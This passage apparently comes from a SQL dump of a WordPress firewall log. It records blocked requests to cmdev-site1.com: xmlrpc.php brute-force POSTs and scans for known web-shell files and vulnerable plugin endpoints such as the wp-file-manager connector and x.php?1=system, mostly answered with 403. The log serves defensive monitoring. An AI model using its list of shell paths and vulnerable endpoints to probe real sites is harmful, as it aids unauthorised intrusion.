Safari\\/537.36\"}','ehmwZENSpCuj4cGWALnibqQF',0,1680021847.2842,571,'','POST',403,0,515,0,1,'',0),('103.149.165.49',1737860401,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','LRJUyr84uIA1ml2opG9PEjx5',0,1680026163.5671,2636,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','xia2j5syPcHOoqFtwSm6bzQD',0,1680026161.8315,5083,'','POST',403,0,515,0,1,'',0),('184.168.99.50',3098043186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','G1lXUxSt2bsgQiAFNvMDeayC',0,1680026172.2289,623,'','POST',403,0,515,0,1,'',0),('164.92.115.99',2757522275,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','4wjhXn61cWyLkgilKJMe2puP',0,1680026173.0701,729,'','POST',403,0,515,0,1,'',0),('89.46.106.145',1496214161,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','gYo2ztrPe3SVauU0NyBEJKXf',0,1680026182.2945,1361,'','POST',403,0,515,0,1,'',0),('51.91.29.218',861609434,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','YGhfXurVH6OkZBogWUjl4iNp',0,1680026189.5802,740,'','POST',403,0,515,0,1,'',0),('34.172.150.73',581736009,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','jqvZ80YiJ5Tsp6n1GVRLKWrz',0,1680026193.2003,682,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','iaN0PFyYOodx4XEkDusqBwIT',0,1680026193.8857,715,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','K9vLGx5mZ0hCpOzI6VgnPab8',0,1680026200.0553,1340,'','POST',403,0,515,0,1,'',0),('34.172.150.73',581736009,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','46V2CrxRfN1gm8cj3sZAtTok',0,1680028629.5201,10342,'','POST',403,0,515,0,1,'',0),('185.31.79.172',3105836972,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','6U0GwPagnNVf8yKmu2IYBe4Z',0,1680028629.0743,10788,'','POST',403,0,515,0,1,'',0),('92.205.5.199',1556940231,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','JtsScR1FNKfXlPOo9DEqBe32',0,1680028637.1976,3618,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','iMZNUWlACk4fdyVBsSa9vGpF',0,1680028650.3888,613,'','POST',403,0,515,0,1,'',0),('43.154.142.51',731549235,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','3C71uosJ4yA9VSrQHNjdOxmI',0,1680028660.5102,613,'','POST',403,0,515,0,1,'',0),('177.125.60.21',2977774613,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','w2xXqpBCcdNrsmYKeoFWUA6T',0,1680028675.7570,898,'','POST',404,0,515,0,1,'',0),('198.71.231.8',3326600968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','sXqlrwOC26xe7EmuBZaGDQKg',0,1680028675.8594,1100,'','POST',403,0,515,0,1,'',0),('162.253.54.78',2734503502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','HajMNvqD3EOxuJGBTbpZ9l2e',0,1680031588.2758,690,'','POST',403,0,515,0,1,'',0),('92.81.223.229',1548869605,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','4acldNBZ615Mv9TPbpX0Q8Kw',0,1680031591.7210,639,'','POST',403,0,515,0,1,'',0),('147.78.47.249',2471374841,'','http://mail.cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Safari\\/537.36\"}','08SPwN6ktuYm7VxBQLRJfDh2',0,1680037072.7141,1912,'','GET',403,0,700,0,1,'',0),('40.80.83.88',676352856,'','https://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','OnP4xAq9tIBTzG5Q1dfi8jaE',0,1680107370.6562,1915,'','POST',403,0,700,0,1,'',0),('40.80.83.88',676352856,'','http://cmdev-site1.com/alfacgiapi/perl.alfa','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','0WsU7nghLBZYa9MSmEPJ2V4D',0,1680107373.5572,683,'','POST',403,0,700,0,1,'',0),('40.80.83.88',676352856,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','oR1gyH6ZEPbms2vSn5jriXdQ',0,1680107374.8942,304,'','GET',403,0,700,0,1,'',0),('40.80.83.88',676352856,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','pnR5erhDmgGUK0ABxjHCEZP7',0,1680107375.6147,275,'','GET',403,0,700,0,1,'',0),('40.80.83.88',676352856,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','nCrtfXJoHM0ZNLIbpSueBGA6',0,1680107376.3169,313,'','GET',403,0,700,0,1,'',0),('40.80.83.88',676352856,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','tpr5idj3CFqHb9fXSV7zUxk2',0,1680107377.0597,273,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','https://cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','epSlCftgbrOQqaB2o34sKhFY',0,1680137273.4863,285,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UkqA9B8RPQXFImpK65crgD3a',0,1680138210.4693,1653,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','8qdZg3t57IELGzlUiAKSabPF',0,1680138213.0995,292,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','https://cmdev-site1.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','5g3KMlGxt6hF8V1cWBj29spE',0,1680144797.6806,286,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','https://cmdev-site1.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','c3dWBZMSfeYDTots5h4yRial',0,1680144798.7131,330,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','https://cmdev-site1.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','HZq1Skv7jFnVfhBuKpyLMoXl',0,1680144799.8101,278,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','https://cmdev-site1.com/wp-includes/class-wp-page-icon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','d75IVErLPAT0awFoxSGNRmZB',0,1680144800.8362,294,'','GET',403,0,700,0,1,'',0),('165.232.168.48',2783488048,'','https://cmdev-site1.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','u1wZc5PL7NRebsOkFhyTXSDm',0,1680144801.8336,296,'','GET',403,0,700,0,1,'',0),('185.129.248.170',3112302762,'','http://cmdev-site1.com/class.api.php?1918','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','27nrS0Wlk5XRZvImNfhwUTHd',0,1680213416.5037,302,'','GET',403,0,700,0,1,'',0),('122.155.3.106',2056979306,'','http://cmdev-site1.com/use.php?1915','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','XlgOUCamDTEZnicNuP7dFLft',0,1680213465.3031,323,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/wp-content/plugins/anttt/simple.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','y2OrJ7DWcjKFNgVmSLUI6xdo',0,1680222930.2900,2228,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','https://cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','hXius1fT4xNO70jRcWtKIU9V',0,1680222933.2579,287,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Wy8E6NRGnghI5j7iQYadMuXr',0,1680222934.0996,317,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','https://cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','KZ8tp346c7himy0okxJgHuNP',0,1680222935.1567,319,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Z8F45iAeMn2zVmxLXfckdCaT',0,1680223098.5847,1502,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','hQEAynYoFB0XelfmwrG8NZM3',0,1680223100.8192,292,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','https://cmdev-site1.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','4ixQajwGmIXMKPuzOVodJDBl',0,1680224050.3496,1505,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','https://cmdev-site1.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','hwpjvC80qugxHSIZPGOy5TXW',0,1680224052.6355,318,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','https://cmdev-site1.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','uU59MYBbqc3ZdSpQrasK4XtE',0,1680224053.7387,321,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','https://cmdev-site1.com/wp-includes/class-wp-page-icon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','mIrSJl0u4Y3KOeNZRw8EWyVQ',0,1680224054.8243,279,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','https://cmdev-site1.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','MiZ1yxufS5mnJQEHa4FeCzBs',0,1680224055.8098,282,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com//wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9JnfLVFN85tuQhq0bZdyrzwp',0,1680239337.9940,323,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com//wp-content/plugins/apikey/apikey.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ePJKhd6OWVYx8UfQNpmg50t2',0,1680239338.8657,291,'','POST',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com//wp-content/plugins/apikey/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','q1Xns9zWvumRfObkpl45xahy',0,1680239339.7263,311,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com//wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','yO054LQtfdCeY9XTNxE3G6uv',0,1680239341.8488,315,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com//abruzi.php4','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','o1YVWhdTpLACJXKmbsD7n5Mx',0,1680239344.0204,276,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com//wp-content/x.php?1=system','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','aNgYFej8hbcsqoxmE9C31kJ0',0,1680239345.9484,280,'','POST',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com//wp-content/king.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','xKPYWOiDoXZ5G9qIEe04Sprf',0,1680239346.7906,284,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','62jDuQOR8TA9CoE5t7msPeKg',0,1680239347.6684,280,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com//wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','oWRM41PqmjiJAvZ3nIQF2bfB',0,1680239348.4737,281,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','y94Ii251GgDfHtChAuQJcTdv',0,1680248340.8030,857,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','0hWQ8GMYHbpeUcu16mzvZfBX',0,1680248342.2968,302,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','nekjqQbvryxI7Omict2u4YLz',0,1680248343.1604,300,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','UVSId8h3bnNAE7q2YlyKuCWe',0,1680248344.0213,345,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','RnU87PJXVtSiIa4wEMuLKGj5',0,1680248344.9328,297,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','joct3UrPfZa2pIL5mnJ19Cez',0,1680248345.7782,292,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','VafIiALj2eSd35HURgMxXnzC',0,1680248346.6409,306,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','S6LdRJy1C7sOTmXZxwG3Yhfc',0,1680248347.5117,297,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','NoCTweqhmA1fpUSRKGIW7xJH',0,1680248348.3344,322,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','Ax1MlDd6RK7hwjsGXpNtC9mi',0,1680248349.2183,285,'','GET',403,0,700,0,1,'',0),('167.71.192.36',2806497316,'','http://cmdev-site1.com/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','ySTeGx3uBgr5vaUJ8Pshl9Fq',0,1680248350.0961,296,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/Makhdamx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','RfAl8icJySCtXQV90rDG4hFe',0,1680266258.6142,321,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/Makhdamx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','byhcvRUsfOaAdBmp1832x67L',0,1680266259.6554,280,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/database.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','frvPS5u7HokA8EtdR1b4XhwY',0,1680266260.6224,292,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','zoxGDCTlLnA5vtpH2c9Sk7OK',0,1680266261.6768,306,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','1QvYMr2LJfXHxqiIE8u3lNtO',0,1680266262.7458,279,'','GET',403,0,700,0,1,'',0),('103.90.160.176',1733992624,'','http://cmdev-site1.com/xltavrat.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 